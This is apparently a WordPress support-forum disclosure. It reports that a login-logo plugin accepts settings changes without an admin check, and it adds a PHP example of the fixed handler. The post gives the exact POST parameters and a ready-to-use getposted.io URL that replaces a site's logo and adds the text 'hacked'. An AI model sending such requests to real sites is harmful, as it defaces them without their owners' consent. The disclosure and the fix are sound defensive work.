Security Issue
-
This plugin does not check that an admin is logged in before updating the database with the logo you want to use.
This means you can make a POST request to any website that uses this plugin with the following parameters, and the logo will be changed:
wpclpl_save=1
wpclpl_logo_url=https://example.com/bad-logo.png
You can test this with the following URL (change EXAMPLE.COM to your own domain):
https://getposted.io/post?action=https://EXAMPLE.COM&wpclpl_save=1&wpclpl_logo_url=https://i.giphy.com/JhqJUTyFPubQs.gif&wpclpl_additional_text=hacked
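For reference, this is how a settings-save handler for the parameters above would look with the missing checks in place. It is an added example, not the plugin's own code: the parameter names come from the post, while the hook, option names, nonce action and form markup are assumptions.

```php
<?php
// Added example (not the plugin's code): save the login-page logo only when
// an administrator submitted the plugin's own form with a valid nonce.
// Parameter names are from the report above; hook, option names and the
// nonce action are assumed.
add_action( 'admin_init', 'wpclpl_example_save_settings' );

function wpclpl_example_save_settings() {
    // Only act on the plugin's own save request.
    if ( empty( $_POST['wpclpl_save'] ) ) {
        return;
    }

    // 1. Capability check: anonymous visitors and low-privileged users are
    //    rejected before anything from the request is trusted.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to change these settings.' ), '', array( 'response' => 403 ) );
    }

    // 2. CSRF check: the form must carry a nonce bound to this action, so a
    //    POST from another origin cannot ride on a logged-in admin's session.
    check_admin_referer( 'wpclpl_save_settings', 'wpclpl_nonce' );

    // 3. Validate and sanitize the values before they reach the database.
    $logo_url = isset( $_POST['wpclpl_logo_url'] ) ? esc_url_raw( wp_unslash( $_POST['wpclpl_logo_url'] ) ) : '';
    if ( '' !== $logo_url && ! wp_http_validate_url( $logo_url ) ) {
        wp_die( esc_html__( 'Invalid logo URL.' ), '', array( 'response' => 400 ) );
    }
    $text = isset( $_POST['wpclpl_additional_text'] ) ? sanitize_text_field( wp_unslash( $_POST['wpclpl_additional_text'] ) ) : '';

    update_option( 'wpclpl_logo_url', $logo_url );
    update_option( 'wpclpl_additional_text', $text );
}

// The settings form must emit the matching nonce field (assumed markup).
function wpclpl_example_render_form() {
    ?>
    <form method="post">
        <?php wp_nonce_field( 'wpclpl_save_settings', 'wpclpl_nonce' ); ?>
        <input type="url" name="wpclpl_logo_url" value="<?php echo esc_attr( get_option( 'wpclpl_logo_url', '' ) ); ?>">
        <input type="text" name="wpclpl_additional_text" value="<?php echo esc_attr( get_option( 'wpclpl_additional_text', '' ) ); ?>">
        <?php submit_button( 'Save', 'primary', 'wpclpl_save' ); ?>
    </form>
    <?php
}
```

With these checks, the POST described in the report is rejected with a 403 for anonymous visitors and with a nonce failure for cross-site requests, which is the behaviour the report says is currently missing.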
The topic ‘Security Issue’ is closed to new replies.